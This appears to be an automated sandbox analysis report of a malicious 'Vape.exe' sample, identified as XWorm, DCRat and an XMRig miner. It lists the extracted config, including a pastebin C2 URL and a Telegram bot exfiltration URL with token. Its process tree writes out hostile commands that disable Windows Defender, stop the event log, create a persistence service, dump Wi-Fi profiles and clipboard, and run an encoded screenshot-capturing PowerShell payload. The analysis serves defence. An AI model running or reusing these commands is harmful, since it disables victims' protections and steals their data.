Analysis
-
max time kernel
1800s -
max time network
1799s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
22-05-2024 13:42
General
-
Target
Vape.exe
-
Size
16.9MB
-
MD5
b682cd3286eb0cd188dc896d6fd7fa0c
-
SHA1
f6f15cbc94072cbdab5ae4548c4b13d787f6f617
-
SHA256
66ac4015c48cc00c995fc8910d09e2ccc0b559785fc52a959a4d2de9fdb8c62b
-
SHA512
a30ada153f1c2ead70bbe27b3bb770512d04b469ec3e3f19266f81cd06150e1297e06877c5ed899040a7a760d64d24892477df17294721fd8560082a634ce2f5
-
SSDEEP
393216:61HGgtq8HRisK/m6Smj8xBPKEUVrHCKAfcI:6tGOqKRO/9Smj8bPsxsfcI
Score
10/10
Malware Config
Extracted
Family
xworm
Attributes
-
Install_directory
%AppData%
-
install_file
Microsoft_WindowsDefender.exe
-
pastebin_url
https://pastebin.com/raw/dxKNAdeE
-
telegram
https://api.telegram.org/bot7013809678:AAEFwh-OW3w4YnEldOGR6NvGudG5gj8iF0Q/sendMessage?chat_id=5073217277
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Xworm Payload 2 IoCs
-
Process spawned unexpected child process 30 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
DCRat payload 4 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
XMRig Miner payload 7 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 34 IoCs
-
Loads dropped DLL 32 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 64 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 36 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 13 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 20 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 31 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Detects videocard installed 1 TTPs 6 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 10 IoCs
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 41 IoCs
-
Suspicious use of UnmapMainImage 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Webdriversession\cmd.exeC:\Webdriversession\cmd.exe2⤵
- Executes dropped EXE
-
C:\Windows\de-DE\conhost.exeC:\Windows\de-DE\conhost.exe2⤵
- Executes dropped EXE
-
C:\Recovery\WindowsRE\sysmon.exeC:\Recovery\WindowsRE\sysmon.exe2⤵
- Executes dropped EXE
-
C:\Windows\ImmersiveControlPanel\sihost.exeC:\Windows\ImmersiveControlPanel\sihost.exe2⤵
- Executes dropped EXE
-
C:\Users\All Users\Templates\tasklist.exe"C:\Users\All Users\Templates\tasklist.exe"2⤵
- Executes dropped EXE
- Enumerates processes with tasklist
-
C:\Users\All Users\Documents\Microsoft_R.exe"C:\Users\All Users\Documents\Microsoft_R.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Common Files\microsoft shared\Triedit\dllhost.exe"C:\Program Files\Common Files\microsoft shared\Triedit\dllhost.exe"2⤵
- Executes dropped EXE
-
C:\Webdriversession\cmd.exeC:\Webdriversession\cmd.exe2⤵
- Executes dropped EXE
-
C:\Windows\de-DE\conhost.exeC:\Windows\de-DE\conhost.exe2⤵
- Executes dropped EXE
-
C:\Recovery\WindowsRE\sysmon.exeC:\Recovery\WindowsRE\sysmon.exe2⤵
- Executes dropped EXE
-
C:\Windows\ImmersiveControlPanel\sihost.exeC:\Windows\ImmersiveControlPanel\sihost.exe2⤵
- Executes dropped EXE
-
C:\Users\All Users\Templates\tasklist.exe"C:\Users\All Users\Templates\tasklist.exe"2⤵
- Executes dropped EXE
- Enumerates processes with tasklist
-
C:\Users\All Users\Documents\Microsoft_R.exe"C:\Users\All Users\Documents\Microsoft_R.exe"2⤵
- Executes dropped EXE
-
C:\Webdriversession\cmd.exeC:\Webdriversession\cmd.exe2⤵
- Executes dropped EXE
-
C:\Windows\de-DE\conhost.exeC:\Windows\de-DE\conhost.exe2⤵
- Executes dropped EXE
-
C:\Recovery\WindowsRE\sysmon.exeC:\Recovery\WindowsRE\sysmon.exe2⤵
- Executes dropped EXE
-
C:\Program Files\Common Files\microsoft shared\Triedit\dllhost.exe"C:\Program Files\Common Files\microsoft shared\Triedit\dllhost.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Vape.exe"C:\Users\Admin\AppData\Local\Temp\Vape.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Webdriversession\gI2DkJwTD.vbe"4⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Webdriversession\SoPkc.bat" "5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Webdriversession\Intoref.exe"C:\Webdriversession\Intoref.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Webdriversession\cmd.exe"C:\Webdriversession\cmd.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "QHRAJGDI"4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "QHRAJGDI" binpath= "C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe" start= "auto"4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "QHRAJGDI"4⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
